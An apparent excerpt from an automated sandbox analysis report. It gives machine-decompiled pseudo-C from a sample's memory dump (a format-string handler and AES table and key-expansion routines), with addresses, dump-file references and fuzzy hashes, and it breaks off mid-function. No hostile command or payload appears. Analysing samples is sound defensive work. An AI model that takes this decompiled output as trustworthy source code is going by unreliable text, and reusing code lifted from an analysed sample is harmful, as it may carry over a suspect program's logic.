    						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
    						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
    							goto L49;
    						}
    						goto L48;
    					}
    					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
    					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
    						goto L5;
    					}
    					_t90 = E00844495(__ecx);
    					__eflags = _t90;
    					if(_t90 == 0) {
    						goto L51;
    					}
    					goto L5;
    				}
    				return 1;
    			}

































    0x00843a01
    0x00843a03
    0x00843a0d
    0x00843a14
    0x00843a18
    0x00843a34
    0x00843a35
    0x00843a35
    0x00843a38
    0x00843a46
    0x00843a49
    0x00843a4e
    0x00843a51
    0x00843a8a
    0x00000000
    0x00843a8a
    0x00843a61
    0x00843a64
    0x00843a69
    0x00843a6b
    0x00843a74
    0x00843a74
    0x00843a77
    0x00843a77
    0x00843a78
    0x00843a7b
    0x00000000
    0x00000000
    0x00843a7d
    0x00843a82
    0x00843a83
    0x00843a85
    0x00000000
    0x00000000
    0x00000000
    0x00843a85
    0x00843a87
    0x00000000
    0x00843a87
    0x00843a6d
    0x00843a8e
    0x00843a8e
    0x00843a8f
    0x00843a8f
    0x00843a9f
    0x00843aa1
    0x00843aa9
    0x00843aaa
    0x00843aab
    0x00843aaf
    0x00843ab4
    0x00843ab4
    0x00843ab6
    0x00843ab6
    0x00843aba
    0x00843ad8
    0x00843ada
    0x00843ae1
    0x00843ae7
    0x00843aed
    0x00843af1
    0x00843b1e
    0x00843b1f
    0x00843b20
    0x00843b24
    0x00843b26
    0x00843b41
    0x00843b44
    0x00843b50
    0x00843b52
    0x00843b56
    0x00843b5b
    0x00843b67
    0x00843b69
    0x00843b6b
    0x00843b6d
    0x00843b6d
    0x00843b6f
    0x00843b77
    0x00843b77
    0x00843b7a
    0x00843b86
    0x00843b88
    0x00843b8b
    0x00843bd5
    0x00843bf2
    0x00843bf2
    0x00843bf5
    0x00843bd7
    0x00843be1
    0x00843be4
    0x00843be4
    0x00843bf9
    0x00843bfe
    0x00843bfe
    0x00843bff
    0x00843c05
    0x00000000
    0x00000000
    0x00843c07
    0x00843c0c
    0x00843c0d
    0x00843c0f
    0x00000000
    0x00000000
    0x00843c11
    0x00843c11
    0x00000000
    0x00843c11
    0x00000000
    0x00843bfe
    0x00843b8d
    0x00843b90
    0x00843bad
    0x00843bad
    0x00843bb0
    0x00843b92
    0x00843b9c
    0x00843b9f
    0x00843b9f
    0x00843bb4
    0x00843bb9
    0x00843bbb
    0x00843c38
    0x00843c38
    0x00843c9f
    0x00843ca1
    0x00000000
    0x00843bbd
    0x00843bbd
    0x00843bbd
    0x00843bbe
    0x00843bc4
    0x00000000
    0x00000000
    0x00843bca
    0x00843bce
    0x00843bcf
    0x00843bd1
    0x00000000
    0x00000000
    0x00000000
    0x00843bd3
    0x00000000
    0x00843bbd
    0x00843bbb
    0x00843b7c
    0x00843b80
    0x00000000
    0x00843b80
    0x00843b2b
    0x00843b2e
    0x00843b2e
    0x00843b30
    0x00000000
    0x00000000
    0x00843b32
    0x00843b33
    0x00843b36
    0x00843b39
    0x00000000
    0x00000000
    0x00000000
    0x00843b3b
    0x00843b3d
    0x00000000
    0x00843b3d
    0x00843af5
    0x00843af8
    0x00843b02
    0x00843b0a
    0x00843b0f
    0x00843b12
    0x00000000
    0x00843b12
    0x00843ac5
    0x00843ac7
    0x00000000
    0x00000000
    0x00843acb
    0x00843ad0
    0x00843ad2
    0x00000000
    0x00000000
    0x00000000
    0x00843c15
    0x00843c15
    0x00843c15
    0x00843c21
    0x00843c21
    0x00843c28
    0x00843c2c
    0x00843c3c
    0x00843c3c
    0x00843c47
    0x00843c4c
    0x00843c4d
    0x00843c50
    0x00843c55
    0x00843c5f
    0x00843c67
    0x00843c68
    0x00843c6d
    0x00843c77
    0x00843c7f
    0x00843c80
    0x00843c85
    0x00843c8d
    0x00843c95
    0x00843c98
    0x00843c9d
    0x00000000
    0x00843c9d
    0x00843c30
    0x00843c36
    0x00000000
    0x00000000
    0x00000000
    0x00843c36
    0x00843a23
    0x00843a25
    0x00000000
    0x00000000
    0x00843a27
    0x00843a2c
    0x00843a2e
    0x00000000
    0x00000000
    0x00000000
    0x00843a2e
    0x00000000

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 209afea29aacf21f6988cc42c4347deef14359ebf5857457a8887e82daa47dd8
    • Instruction ID: eb2934222fbbfa4a251224204fc8d8875e405718b92aeeba7d46d770652b3be6
    • Opcode Fuzzy Hash: 209afea29aacf21f6988cc42c4347deef14359ebf5857457a8887e82daa47dd8
    • Instruction Fuzzy Hash: 8E71247170434D5BDB28DE6CC8C1BAD77D5FBA0308F00092DE9C6DB282DA34CA858796
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00853D1A(void* __ecx) {
    				char _v6;
    				char _v8;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char _t49;
    				signed int _t50;
    				void* _t51;
    				signed char _t54;
    				signed char _t56;
    				signed int _t57;
    				signed int _t58;
    				signed char _t67;
    				signed char _t69;
    				signed char _t71;
    				signed char _t80;
    				signed char _t82;
    				signed int _t84;
    				signed int _t86;
    				signed int _t87;
    				signed char _t92;
    				void* _t95;
    				intOrPtr _t100;
    				unsigned int _t102;
    				signed char _t104;
    				void* _t112;
    				unsigned int _t113;
    				void* _t114;
    				signed int _t115;
    				signed int* _t116;
    				void* _t119;
    				void* _t121;
    				void* _t122;
    				void* _t124;
    				void* _t125;
    
    				_push(__ecx);
    				_t119 = __ecx;
    				_t92 = 1;
    				_t49 =  *((char*)(__ecx + 0x31));
    				_t124 = _t49 - 0x64;
    				if(_t124 > 0) {
    					__eflags = _t49 - 0x70;
    					if(__eflags > 0) {
    						_t50 = _t49 - 0x73;
    						__eflags = _t50;
    						if(_t50 == 0) {
    							L9:
    							_t51 = E00854908(_t119);
    							L10:
    							if(_t51 != 0) {
    								__eflags =  *((char*)(_t119 + 0x30));
    								if( *((char*)(_t119 + 0x30)) == 0) {
    									_t113 =  *(_t119 + 0x20);
    									_push(_t114);
    									_v8 = 0;
    									_t115 = 0;
    									_v6 = 0;
    									_t54 = _t113 >> 4;
    									__eflags = _t92 & _t54;
    									if((_t92 & _t54) == 0) {
    										L46:
    										_t100 =  *((intOrPtr*)(_t119 + 0x31));
    										__eflags = _t100 - 0x78;
    										if(_t100 == 0x78) {
    											L48:
    											_t56 = _t113 >> 5;
    											__eflags = _t92 & _t56;
    											if((_t92 & _t56) != 0) {
    												L50:
    												__eflags = _t100 - 0x61;
    												if(_t100 == 0x61) {
    													L53:
    													_t57 = 1;
    													L54:
    													__eflags = _t92;
    													if(_t92 != 0) {
    														L56:
    														 *((char*)(_t121 + _t115 - 4)) = 0x30;
    														__eflags = _t100 - 0x58;
    														if(_t100 == 0x58) {
    															L59:
    															_t58 = 1;
    															L60:
    															__eflags = _t58;
    															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
    															_t115 = _t115 + 2;
    															__eflags = _t115;
    															L61:
    															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
    															__eflags = _t113 & 0x0000000c;
    															if((_t113 & 0x0000000c) == 0) {
    																E008531E4(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
    																_t122 = _t122 + 0x10;
    															}
    															E00854BE8(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
    															_t102 =  *(_t119 + 0x20);
    															_t116 = _t119 + 0x18;
    															_t67 = _t102 >> 3;
    															__eflags = _t67 & 0x00000001;
    															if((_t67 & 0x00000001) != 0) {
    																_t104 = _t102 >> 2;
    																__eflags = _t104 & 0x00000001;
    																if((_t104 & 0x00000001) == 0) {
    																	E008531E4(_t119 + 0x448, 0x30, _t95, _t116);
    																	_t122 = _t122 + 0x10;
    																}
    															}
    															E00854AB6(_t95, _t119, _t116, _t119, 0);
    															__eflags =  *_t116;
    															if( *_t116 >= 0) {
    																_t71 =  *(_t119 + 0x20) >> 2;
    																__eflags = _t71 & 0x00000001;
    																if((_t71 & 0x00000001) != 0) {
    																	E008531E4(_t119 + 0x448, 0x20, _t95, _t116);
    																}
    															}
    															_t69 = 1;
    															L70:
    															return _t69;
    														}
    														__eflags = _t100 - 0x41;
    														if(_t100 == 0x41) {
    															goto L59;
    														}
    														_t58 = 0;
    														goto L60;
    													}
    													__eflags = _t57;
    													if(_t57 == 0) {
    														goto L61;
    													}
    													goto L56;
    												}
    												__eflags = _t100 - 0x41;
    												if(_t100 == 0x41) {
    													goto L53;
    												}
    												_t57 = 0;
    												goto L54;
    											}
    											L49:
    											_t92 = 0;
    											__eflags = 0;
    											goto L50;
    										}
    										__eflags = _t100 - 0x58;
    										if(_t100 != 0x58) {
    											goto L49;
    										}
    										goto L48;
    									}
    									_t80 = _t113 >> 6;
    									__eflags = _t92 & _t80;
    									if((_t92 & _t80) == 0) {
    										__eflags = _t92 & _t113;
    										if((_t92 & _t113) == 0) {
    											_t82 = _t113 >> 1;
    											__eflags = _t92 & _t82;
    											if((_t92 & _t82) == 0) {
    												goto L46;
    											}
    											_v8 = 0x20;
    											L45:
    											_t115 = _t92;
    											goto L46;
    										}
    										_v8 = 0x2b;
    										goto L45;
    									}
    									_v8 = 0x2d;
    									goto L45;
    								}
    								_t69 = _t92;
    								goto L70;
    							}
    							L11:
    							_t69 = 0;
    							goto L70;
    						}
    						_t84 = _t50;
    						__eflags = _t84;
    						if(__eflags == 0) {
    							L28:
    							_push(0);
    							_push(0xa);
    							L29:
    							_t51 = E00854713(_t119, _t114, __eflags);
    							goto L10;
    						}
    						__eflags = _t84 - 3;
    						if(__eflags != 0) {
    							goto L11;
    						}
    						_push(0);
    						L13:
    						_push(0x10);
    						goto L29;
    					}
    					if(__eflags == 0) {
    						_t51 = E008548F0(__ecx);
    						goto L10;
    					}
    					__eflags = _t49 - 0x67;
    					if(_t49 <= 0x67) {
    						L30:
    						_t51 = E0085431F(_t92, _t119);
    						goto L10;
    					}
    					__eflags = _t49 - 0x69;
    					if(_t49 == 0x69) {
    						L27:
    						_t2 = _t119 + 0x20;
    						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
    						__eflags =  *_t2;
    						goto L28;
    					}
    					__eflags = _t49 - 0x6e;
    					if(_t49 == 0x6e) {
    						_t51 = E0085485D(__ecx, _t112);
    						goto L10;
    					}
    					__eflags = _t49 - 0x6f;
    					if(_t49 != 0x6f) {
    						goto L11;
    					}
    					_t51 = E008548D1(__ecx);
    					goto L10;
    				}
    				if(_t124 == 0) {
    					goto L27;
    				}
    				_t125 = _t49 - 0x58;
    				if(_t125 > 0) {
    					_t86 = _t49 - 0x5a;
    					__eflags = _t86;
    					if(_t86 == 0) {
    						_t51 = E00854259(__ecx);
    						goto L10;
    					}
    					_t87 = _t86 - 7;
    					__eflags = _t87;
    					if(_t87 == 0) {
    						goto L30;
    					}
    					__eflags = _t87;
    					if(__eflags != 0) {
    						goto L11;
    					}
    					L17:
    					_t51 = E008545EB(_t92, _t119, __eflags, 0);
    					goto L10;
    				}
    				if(_t125 == 0) {
    					_push(1);
    					goto L13;
    				}
    				if(_t49 == 0x41) {
    					goto L30;
    				}
    				if(_t49 == 0x43) {
    					goto L17;
    				}
    				if(_t49 <= 0x44) {
    					goto L11;
    				}
    				if(_t49 <= 0x47) {
    					goto L30;
    				}
    				if(_t49 != 0x53) {
    					goto L11;
    				}
    				goto L9;
    			}






































    0x00853d1f
    0x00853d22
    0x00853d26
    0x00853d29
    0x00853d2d
    0x00853d30
    0x00853d9e
    0x00853da1
    0x00853df0
    0x00853df0
    0x00853df3
    0x00853d60
    0x00853d62
    0x00853d67
    0x00853d69
    0x00853e0e
    0x00853e12
    0x00853e1b
    0x00853e20
    0x00853e21
    0x00853e25
    0x00853e27
    0x00853e2c
    0x00853e2f
    0x00853e31
    0x00853e5a
    0x00853e5a
    0x00853e5d
    0x00853e60
    0x00853e67
    0x00853e69
    0x00853e6c
    0x00853e6e
    0x00853e72
    0x00853e72
    0x00853e75
    0x00853e80
    0x00853e80
    0x00853e82
    0x00853e82
    0x00853e84
    0x00853e8a
    0x00853e8a
    0x00853e8f
    0x00853e92
    0x00853e9d
    0x00853e9d
    0x00853e9f
    0x00853e9f
    0x00853eaa
    0x00853eae
    0x00853eae
    0x00853eb1
    0x00853eb7
    0x00853eb9
    0x00853ebc
    0x00853ecc
    0x00853ed1
    0x00853ed1
    0x00853ee6
    0x00853eeb
    0x00853eee
    0x00853ef3
    0x00853ef6
    0x00853ef8
    0x00853efa
    0x00853efd
    0x00853f00
    0x00853f0d
    0x00853f12
    0x00853f12
    0x00853f00
    0x00853f19
    0x00853f1e
    0x00853f21
    0x00853f26
    0x00853f29
    0x00853f2b
    0x00853f38
    0x00853f3d
    0x00853f2b
    0x00853f40
    0x00853f43
    0x00853f48
    0x00853f48
    0x00853e94
    0x00853e97
    0x00000000
    0x00000000
    0x00853e99
    0x00000000
    0x00853e99
    0x00853e86
    0x00853e88
    0x00000000
    0x00000000
    0x00000000
    0x00853e88
    0x00853e77
    0x00853e7a
    0x00000000
    0x00000000
    0x00853e7c
    0x00000000
    0x00853e7c
    0x00853e70
    0x00853e70
    0x00853e70
    0x00000000
    0x00853e70
    0x00853e62
    0x00853e65
    0x00000000
    0x00000000
    0x00000000
    0x00853e65
    0x00853e35
    0x00853e38
    0x00853e3a
    0x00853e42
    0x00853e44
    0x00853e4e
    0x00853e50
    0x00853e52
    0x00000000
    0x00000000
    0x00853e54
    0x00853e58
    0x00853e58
    0x00000000
    0x00853e58
    0x00853e46
    0x00000000
    0x00853e46
    0x00853e3c
    0x00000000
    0x00853e3c
    0x00853e14
    0x00000000
    0x00853e14
    0x00853d6f
    0x00853d6f
    0x00000000
    0x00853d6f
    0x00853dfa
    0x00853dfa
    0x00853dfd
    0x00853dcf
    0x00853dcf
    0x00853dd0
    0x00853dd2
    0x00853dd4
    0x00000000
    0x00853dd4
    0x00853dff
    0x00853e02
    0x00000000
    0x00000000
    0x00853e08
    0x00853d77
    0x00853d77
    0x00000000
    0x00853d77
    0x00853da3
    0x00853de6
    0x00000000
    0x00853de6
    0x00853da5
    0x00853da8
    0x00853ddb
    0x00853ddd
    0x00000000
    0x00853ddd
    0x00853daa
    0x00853dad
    0x00853dcb
    0x00853dcb
    0x00853dcb
    0x00853dcb
    0x00000000
    0x00853dcb
    0x00853daf
    0x00853db2
    0x00853dc4
    0x00000000
    0x00853dc4
    0x00853db4
    0x00853db7
    0x00000000
    0x00000000
    0x00853dbb
    0x00000000
    0x00853dbb
    0x00853d32
    0x00000000
    0x00000000
    0x00853d38
    0x00853d3b
    0x00853d7b
    0x00853d7b
    0x00853d7e
    0x00853d97
    0x00000000
    0x00853d97
    0x00853d80
    0x00853d80
    0x00853d83
    0x00000000
    0x00000000
    0x00853d86
    0x00853d89
    0x00000000
    0x00000000
    0x00853d8b
    0x00853d8e
    0x00000000
    0x00853d8e
    0x00853d3d
    0x00853d76
    0x00000000
    0x00853d76
    0x00853d42
    0x00000000
    0x00000000
    0x00853d4b
    0x00000000
    0x00000000
    0x00853d50
    0x00000000
    0x00000000
    0x00853d55
    0x00000000
    0x00000000
    0x00853d5e
    0x00000000
    0x00000000
    0x00000000

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
    • Instruction ID: 133587360c2cdb17f7179c3bfb9cab04d931e257d411d3b98343f187ef853c4f
    • Opcode Fuzzy Hash: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
    • Instruction Fuzzy Hash: B7515861600B4857DB35856C84577BEB7F9FB027CBF58081AEC42DB682C615DF4D8362
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0083DB11() {
    				intOrPtr _v8;
    				char _v521;
    				char _t140;
    				signed int _t154;
    				signed int _t155;
    				signed int _t159;
    				signed int _t160;
    				signed int _t161;
    				signed int _t162;
    				signed int _t179;
    				signed int _t181;
    				signed char _t192;
    				signed int _t199;
    				signed int _t207;
    				void* _t208;
    				signed int _t209;
    				signed char _t211;
    				signed int _t219;
    				void* _t220;
    
    				_t140 = 0;
    				_t179 = 1;
    				_t207 = 1;
    				do {
    					 *(_t220 + _t140 - 0x304) = _t207;
    					 *(_t220 + _t140 - 0x205) = _t207;
    					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
    					_v8 = _t140 + 1;
    					asm("sbb ecx, ecx");
    					_t140 = _v8;
    					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
    				} while (_t207 != 1);
    				_t208 = 0;
    				do {
    					 *(_t208 + 0x874330) = _t179;
    					asm("sbb ecx, ecx");
    					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
    					_t208 = _t208 + 1;
    				} while (_t208 < 0x1e);
    				_t181 = 0;
    				do {
    					if(_t181 == 0) {
    						_t209 = 0;
    					} else {
    						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
    					}
    					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
    					 *(_t181 + 0x874130) = _t192;
    					 *(0x874f51 + _t181 * 4) = _t192;
    					 *(0x874f50 + _t181 * 4) = _t192;
    					 *(0x874b53 + _t181 * 4) = _t192;
    					 *(0x874b50 + _t181 * 4) = _t192;
    					 *(0x874753 + _t181 * 4) = _t192;
    					 *(0x874752 + _t181 * 4) = _t192;
    					 *(0x874352 + _t181 * 4) = _t192;
    					 *(0x874351 + _t181 * 4) = _t192;
    					if(_t192 == 0) {
    						_t154 = 0;
    					} else {
    						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
    					}
    					 *(0x874f53 + _t181 * 4) = _t154;
    					 *(0x874b52 + _t181 * 4) = _t154;
    					 *(0x874751 + _t181 * 4) = _t154;
    					 *(0x874350 + _t181 * 4) = _t154;
    					if(_t192 == 0) {
    						_t155 = 0;
    					} else {
    						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
    					}
    					_t219 = _t181 & 0x000000ff;
    					 *(0x874f52 + _t181 * 4) = _t155;
    					 *(0x874b51 + _t181 * 4) = _t155;
    					 *(0x874750 + _t181 * 4) = _t155;
    					 *(0x874353 + _t181 * 4) = _t155;
    					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
    						_t211 = 0;
    					} else {
    						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
    					}
    					 *(_t181 + 0x874230) = _t211;
    					if(_t211 == 0) {
    						_t159 = 0;
    					} else {
    						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
    					}
    					_t199 = _t211 & 0x000000ff;
    					 *(0x875f52 + _t181 * 4) = _t159;
    					 *(0x875b51 + _t181 * 4) = _t159;
    					 *(0x875750 + _t181 * 4) = _t159;
    					 *(0x875353 + _t181 * 4) = _t159;
    					 *(0x876f52 + _t199 * 4) = _t159;
    					 *(0x876b51 + _t199 * 4) = _t159;
    					 *(0x876750 + _t199 * 4) = _t159;
    					 *(0x876353 + _t199 * 4) = _t159;
    					if(_t211 == 0) {
    						_t160 = 0;
    					} else {
    						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
    					}
    					 *(0x875f50 + _t181 * 4) = _t160;
    					 *(0x875b53 + _t181 * 4) = _t160;
    					 *(0x875752 + _t181 * 4) = _t160;
    					 *(0x875351 + _t181 * 4) = _t160;
    					 *(0x876f50 + _t199 * 4) = _t160;
    					 *(0x876b53 + _t199 * 4) = _t160;
    					 *(0x876752 + _t199 * 4) = _t160;
    					 *(0x876351 + _t199 * 4) = _t160;
    					if(_t211 == 0) {
    						_t161 = 0;
    					} else {
    						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
    					}
    					 *(0x875f51 + _t181 * 4) = _t161;
    					 *(0x875b50 + _t181 * 4) = _t161;
    					 *(0x875753 + _t181 * 4) = _t161;
    					 *(0x875352 + _t181 * 4) = _t161;
    					 *(0x876f51 + _t199 * 4) = _t161;
    					 *(0x876b50 + _t199 * 4) = _t161;
    					 *(0x876753 + _t199 * 4) = _t161;
    					 *(0x876352 + _t199 * 4) = _t161;
    					if(_t211 == 0) {
    						_t162 = 0;
    					} else {
    						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
    					}
    					 *(0x875f53 + _t181 * 4) = _t162;
    					 *(0x875b52 + _t181 * 4) = _t162;
    					 *(0x875751 + _t181 * 4) = _t162;
    					 *(0x875350 + _t181 * 4) = _t162;
    					_t181 = _t181 + 1;
    					 *(0x876f53 + _t199 * 4) = _t162;
    					 *(0x876b52 + _t199 * 4) = _t162;
    					 *(0x876751 + _t199 * 4) = _t162;
    					 *(0x876350 + _t199 * 4) = _t162;
    				} while (_t181 < 0x100);
    				return _t162;
    			}






















    0x0083db1a
    0x0083db1f
    0x0083db21
    0x0083db28
    0x0083db28
    0x0083db2f
    0x0083db36
    0x0083db3e
    0x0083db4d
    0x0083db53
    0x0083db56
    0x0083db58
    0x0083db5c
    0x0083db5e
    0x0083db60
    0x0083db6d
    0x0083db73
    0x0083db75
    0x0083db76
    0x0083db7b
    0x0083db7d
    0x0083db7f
    0x0083db99
    0x0083db81
    0x0083db94
    0x0083db94
    0x0083dbb7
    0x0083dbb9
    0x0083dbbf
    0x0083dbc6
    0x0083dbcd
    0x0083dbd4
    0x0083dbdb
    0x0083dbe2
    0x0083dbe9
    0x0083dbf0
    0x0083dbf9
    0x0083dc10
    0x0083dbfb
    0x0083dc06
    0x0083dc06
    0x0083dc12
    0x0083dc19
    0x0083dc20
    0x0083dc27
    0x0083dc30
    0x0083dc47
    0x0083dc32
    0x0083dc3d
    0x0083dc3d
    0x0083dc49
    0x0083dc4e
    0x0083dc5a
    0x0083dc66
    0x0083dc6f
    0x0083dc7f
    0x0083dcb3
    0x0083dc81
    0x0083dcaf
    0x0083dcaf
    0x0083dcb5
    0x0083dcbd
    0x0083dcd4
    0x0083dcbf
    0x0083dcca
    0x0083dcca
    0x0083dcd6
    0x0083dcd9
    0x0083dce0
    0x0083dce7
    0x0083dcee
    0x0083dcf5
    0x0083dcfc
    0x0083dd03
    0x0083dd0a
    0x0083dd13
    0x0083dd27
    0x0083dd15
    0x0083dd1d
    0x0083dd1d
    0x0083dd29
    0x0083dd30
    0x0083dd37
    0x0083dd3e
    0x0083dd45
    0x0083dd4c
    0x0083dd53
    0x0083dd5a
    0x0083dd63
    0x0083dd77
    0x0083dd65
    0x0083dd6d
    0x0083dd6d
    0x0083dd79
    0x0083dd80
    0x0083dd87
    0x0083dd8e
    0x0083dd95
    0x0083dd9c
    0x0083dda3
    0x0083ddaa
    0x0083ddb3
    0x0083ddc7
    0x0083ddb5
    0x0083ddbd
    0x0083ddbd
    0x0083ddc9
    0x0083ddd0
    0x0083ddd7
    0x0083ddde
    0x0083dde5
    0x0083dde6
    0x0083dded
    0x0083ddf4
    0x0083ddfb
    0x0083de02
    0x0083de13

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2b10c9f79543deebd0fda49a52cdc94de1e6c6e8746461cc3ea48a9b946933be
    • Instruction ID: 1a15e157cae474c02870326fe26c479ae21565e57c255c55ea7fab80a4f95f5d
    • Opcode Fuzzy Hash: 2b10c9f79543deebd0fda49a52cdc94de1e6c6e8746461cc3ea48a9b946933be
    • Instruction Fuzzy Hash: 3181AD811196D49EC70ACF3C38A82A57FA1B773341F1840AAC4CDC726BD576CAA8C761
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0083E546(intOrPtr __ecx, signed char _a4) {
    				char _v12;
    				signed int _v13;
    				signed int _v14;
    				signed int _v15;
    				signed int _v16;
    				signed char _v17;
    				signed char _v18;
    				signed char _v19;
    				signed char _v20;
    				char _v28;
    				signed int _v29;
    				signed int _v30;
    				signed int _v31;
    				signed int _v32;
    				signed int _v36;
    				intOrPtr _v40;
    				signed char _t96;
    				signed int _t117;
    				signed int* _t121;
    				signed int* _t122;
    				void* _t124;
    				signed int _t125;
    				signed int _t126;
    				signed int _t127;
    				void* _t129;
    				void* _t130;
    				signed int _t131;
    				char* _t132;
    				void* _t133;
    				signed int _t135;
    				intOrPtr _t137;
    				signed char* _t139;
    				void* _t141;
    				void* _t161;
    				void* _t164;
    
    				_t137 = __ecx;
    				_t135 = _a4 - 6;
    				_v40 = __ecx;
    				_v36 = _t135;
    				_t96 = E0084EA80( &_v32, _a4, 0x20);
    				_t141 =  &_v40 + 0xc;
    				_t117 = 0;
    				_t133 = 0;
    				_t126 = 0;
    				if(_t135 <= 0) {
    					L10:
    					if(_t117 <= _a4) {
    						_t127 = 0x874330;
    						do {
    							_v32 = _v32 ^  *(( *(_t141 + 0x15 + _t135 * 4) & 0x000000ff) + 0x874130);
    							_v31 = _v31 ^  *(( *(_t141 + 0x16 + _t135 * 4) & 0x000000ff) + 0x874130);
    							_v30 = _v30 ^  *(( *(_t141 + 0x17 + _t135 * 4) & 0x000000ff) + 0x874130);
    							_v29 = _v29 ^  *(( *(_t141 + 0x14 + _t135 * 4) & 0x000000ff) + 0x874130);
    							_t96 =  *_t127;
    							_v32 = _v32 ^ _t96;
    							_v36 = _t127 + 1;
    							if(_t135 == 8) {
    								_t121 =  &_v28;
    								_a4 = 3;
    								do {
    									_t129 = 4;
    									do {
    										 *_t121 =  *_t121 ^  *(_t121 - 4);
    										_t121 =  &(_t121[0]);
    										_t129 = _t129 - 1;
    									} while (_t129 != 0);
    									_t58 =  &_a4;
    									 *_t58 = _a4 - 1;
    								} while ( *_t58 != 0);
    								_t122 =  &_v12;
    								_a4 = 3;
